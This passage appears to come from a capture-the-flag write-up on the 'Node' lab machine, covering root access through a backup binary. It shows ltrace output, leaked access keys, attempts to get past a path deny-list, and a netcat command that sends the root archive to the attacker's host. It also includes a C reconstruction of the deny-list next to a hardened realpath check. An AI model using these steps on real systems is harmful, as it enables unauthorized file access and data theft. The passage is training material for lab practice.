strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x990f410
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x990f410) = 0xffc355cf
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("test2", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x990f410) = 0xffc355cf
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("test2", "45fac180e9eee72f4fd2d9386ea7033e"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x990f410) = 0xffc355cf
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("test2", "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x990f410) = 0xffc355cf
strcspn("\n", "\n") = 0
strcmp("test2", "") = 1
fgets(nil, 1000, 0x990f410) = 0
strcpy(0xffc34608, "Ah-ah-ah! You didn't say the mag"...) = 0xffc34608
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Ah-ah-ah! You didn't say the mag"... [!] Ah-ah-ah! You didn't say the magic word!
) = 58
This is the place we need to look next: "/etc/myplace/keys"
cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
From the ltrace output you can see the second parameter is compared with each of these values:
strcmp("test2", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
strcmp("test2", "45fac180e9eee72f4fd2d9386ea7033e"...) = 1
strcmp("test2", "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
I am going to replace the second parameter with one of these values and test:
backup test1 a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 test3
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[+] Validated access token
[+] Starting archiving test3
[!] The target path doesn't exist
The result says the target does not exist. Let's point it at a file that exists and compare. I am going to create a test file and run the program again:
touch /tmp/rchitect
$ backup test1 a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect
[+] Validated access token
[+] Starting archiving /tmp/rchitect
[+] Finished! Encoded backup is below:
UEsDBAoACQAAAK4QhFQAAAAADAAAAAAAAAAMABwAdG1wL3JjaGl0ZWN0VVQJAANXREpiV0RKYnV4CwABBOgDAAAE6AMAAAEjLMPWRolSrtwRaVBLBwgAAAAADAAAAAAAAABQSwECHgMKAAkAAACuEIRUAAAAAAwAAAAAAAAADAAYAAAAAAAAAAAApIEAAAAAdG1wL3JjaGl0ZWN0VVQFAANXREpidXgLAAEE6AMAAAToAwAAUEsFBgAAAAABAAEAUgAAAGIAAAAAAA==
So these tests show how the backup program works: it backs up the file or folder given as the third parameter and prints the archive base64-encoded.
Let's try "ltrace" again with the new file we created:
strcmp("a01a6aa5aaf1d7729f35c8278daae30f"..., "") = 1
fgets(nil, 1000, 0x8d0a410) = 0
strstr("/tmp/rchitect", "..") = nil
strstr("/tmp/rchitect", "/root") = nil
strchr("/tmp/rchitect", ';') = nil
strchr("/tmp/rchitect", '&') = nil
strchr("/tmp/rchitect", '`') = nil
strchr("/tmp/rchitect", '$') = nil
strchr("/tmp/rchitect", '|') = nil
strstr("/tmp/rchitect", "//") = nil
strcmp("/tmp/rchitect", "/") = 1
strstr("/tmp/rchitect", "/etc") = nil
We cannot pass "/root/root.txt", as "/root" is already on the comparison list:
strstr("/tmp/rchitect", "/root") = nil
Many more values are also compared; however, the ~ symbol, which the shell expands to the home directory, is not on the list. Let's change the HOME environment variable so that ~ resolves to /root:
env
LESSOPEN=| /usr/bin/lesspipe %s
USER=tom
LANGUAGE=en_GB:en
SHLVL=2
HOME=/home/tom
OLDPWD=/
LOGNAME=tom
_=/tmp/rchitect
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LANG=en_GB.UTF-8
LS_COLORS=
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/usr/local/bin
export HOME=/root/
env
LESSOPEN=| /usr/bin/lesspipe %s
USER=tom
LANGUAGE=en_GB:en
SHLVL=2
HOME=/root/
OLDPWD=/
LOGNAME=tom
_=HOME=/root/
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LANG=en_GB.UTF-8
LS_COLORS=
SHELL=/bin/bash
LESSCLOSE=/usr/bin/less
Now run the backup program again:
backup test1 a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 "~"
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[+] Validated access token
[+] Starting archiving ~
[+] Finished! Encoded backup is below:
Even though the backup appeared to be generated, it did not work, because the path still goes through the same string-comparison checks in the script:
fgets(nil, 1000, 0x85c5410) = 0
strstr("~", "..") = nil
strstr("~", "/root") = nil
strchr("~", ';') = nil
strchr("~", '&') = nil
strchr("~", '`') = nil
strchr("~", '$') = nil
strchr("~", '|') = nil
strstr("~", "//") = nil
strcmp("~", "/") = 1
strstr("~", "/etc") = nil
strcpy(0xffeac15c, "~") = 0xffeac15c
I have tried one more combination, and it still does not work due to this string compare feature.
backup test1 a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 ~
ltrace results
strcspn("\n", "\n") = 0
strcmp("a01a6aa5aaf1d7729f35c8278daae30f"..., "") = 1
fgets(nil, 1000, 0x87e3410) = 0
strstr("/root/", "..") = nil
strstr("/root/", "/root") = "/root/"
I have decided to check more on this script, so I have run the ltrace command with 3 dummy values again:
ltrace backup test1 test2 test3
__libc_start_main(0x80489fd, 4, 0xffd7a9d4, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("test1", "-q") = 1
puts("\n\n\n ________________"...
The script takes the uid of the user and sets it to 0. Then it compares the first argument with "-q".
echo "1" > /tmp/rchitect
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect
UEsDBAoACQAAAEcQhVRT/FFnDgAAAAIAAAAMABwAdG1wL3JjaGl0ZWN0VVQJAAMVlUtiekRKYnV4CwABBOgDAAAE6AMAAESun+H5fObS2erRsWibUEsHCFP8UWcOAAAAAgAAAFBLAQIeAwoACQAAAEcQh VRT/FFnDgAAAAIAAAAMABgAAAAAAAEAAACkgQAAAAB0bXAvcmNoaXRlY3RVVAUAAxWVS2J1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBSAAAAZAAAAAAA$
ltrace backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xffca8228, "a01a6aa5aaf1d7729f35c8278daae30f"..., 100) = 0xffca8228
strcpy(0xffca8211, "/") = 0xffca8211
strstr("/tmp/rchitect", "..") = nil
strstr("/tmp/rchitect", "/root") = nil
strchr("/tmp/rchitect", ';') = nil
strchr("/tmp/rchitect", '&') = nil
strchr("/tmp/rchitect", '`') = nil
strchr("/tmp/rchitect", '$') = nil
strchr("/tmp/rchitect", '|') = nil
strstr("/tmp/rchitect", "//") = nil
strcmp("/tmp/rchitect", "/") = 1
strstr("/tmp/rchitect", "/etc") = nil
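The deny-list that the ltrace output reveals, reconstructed in C as an added example (this is not the backup binary's own source), next to a canonicalising check that rejects what the deny-list lets through; the allowed base directory /tmp is an assumption.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Reconstruction of the chain of strstr/strchr/strcmp calls seen in the
 * ltrace output (assumed from the trace, not the binary's source).
 * Returns 1 if the path passes the deny-list, 0 if it is rejected. */
int denylist_allows(const char *path)
{
    static const char *subs[] = { "..", "/root", "//", "/etc" };
    static const char chars[] = { ';', '&', '`', '$', '|' };
    for (size_t i = 0; i < sizeof subs / sizeof *subs; i++)
        if (strstr(path, subs[i]) != NULL) return 0;
    for (size_t i = 0; i < sizeof chars; i++)
        if (strchr(path, chars[i]) != NULL) return 0;
    if (strcmp(path, "/") == 0) return 0;
    return 1;                      /* a literal "~" passes, as the trace shows */
}

/* Hardened alternative (added design, not the binary's): resolve the path
 * with realpath() and require the result to live under an allowed base.
 * Non-existent paths such as a literal "~" resolve to NULL and are
 * rejected; ".." segments and symlinks are collapsed before comparison. */
int canonical_allows(const char *path, const char *base)
{
    char real[PATH_MAX], realbase[PATH_MAX];
    if (realpath(path, real) == NULL || realpath(base, realbase) == NULL)
        return 0;
    size_t n = strlen(realbase);
    if (strncmp(real, realbase, n) != 0) return 0;
    /* exactly the base, or a child of it ("/tmpfoo" must not match "/tmp") */
    return real[n] == '\0' || real[n] == '/' || strcmp(realbase, "/") == 0;
}

int main(void)
{
    const char *tests[] = { "/tmp/rchitect", "~", "/root/", "/tmp/../etc" };
    for (size_t i = 0; i < sizeof tests / sizeof *tests; i++)
        printf("%-14s denylist=%d canonical(/tmp)=%d\n", tests[i],
               denylist_allows(tests[i]), canonical_allows(tests[i], "/tmp"));
    return 0;
}
```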
Unzipping the archive:
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect | base64 -d > /tmp/back1.zip
cd /tmp
ls
back1.zip
mongodb-27017.sock
rchitect
systemd-private-92ed3baa8e5a4f8eb1ba61458d12cf56-systemd-timesyncd.service-as2fFE
vmware-root
unzip back1.zip
Archive: back1.zip
magicword
extracting: tmp/rchitect
The same way, I am going to try backing up /root. Initially it was saying invalid zip file while we did a backup of /root:
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root | base64 -d > /tmp/root1.zip
base64: invalid input
Let's try the format below to make it a valid zip file:
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root | tail -1 | base64 -d > /tmp/root1.zip
cd /tmp
unzip root1.zip
Archive: root1.zip
skipping: root.txt need PK compat. v5.1 (can do v4.6)
Now transfer this file to the Kali VM and use 7z to extract it.
On the Node machine:
nc 10.10.14.2 4444 < /tmp/root1.zip
On the Kali machine:
nc -lnvp 4444 > root1.zip
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.58] 36426
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ ls
backup root root1.zip
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ 7z x root1.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs AMD Ryzen 9 5900HS with Radeon Graphics (A50F00),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root1.zip
--
Path = root1.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed):
Everything is Ok
Size: 2584
Compressed: 1141
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ ls
backup root root1.zip root.txt
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ head -10 root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
We have the root flag now.
Lessons Learned Link to heading
For the initial user credentials, we need to review the website in Burp or Firefox developer mode to understand how the running program works. The curl -s command is used.
Familiarize yourself with brute-force programs like john and Hydra, which are really useful for exams like OSCP.
How to connect to a MongoDB database and other databases like Oracle and MySQL, and the basic commands to see the details of a database, should be learned.
For the privilege escalation from "mark" to "tom", the real help was in understanding how a program's execution happens; the "ltrace" command was a big help here.
Finally, using 7z instead of unzip was a little tricky here, which I learned through other forums/writeups.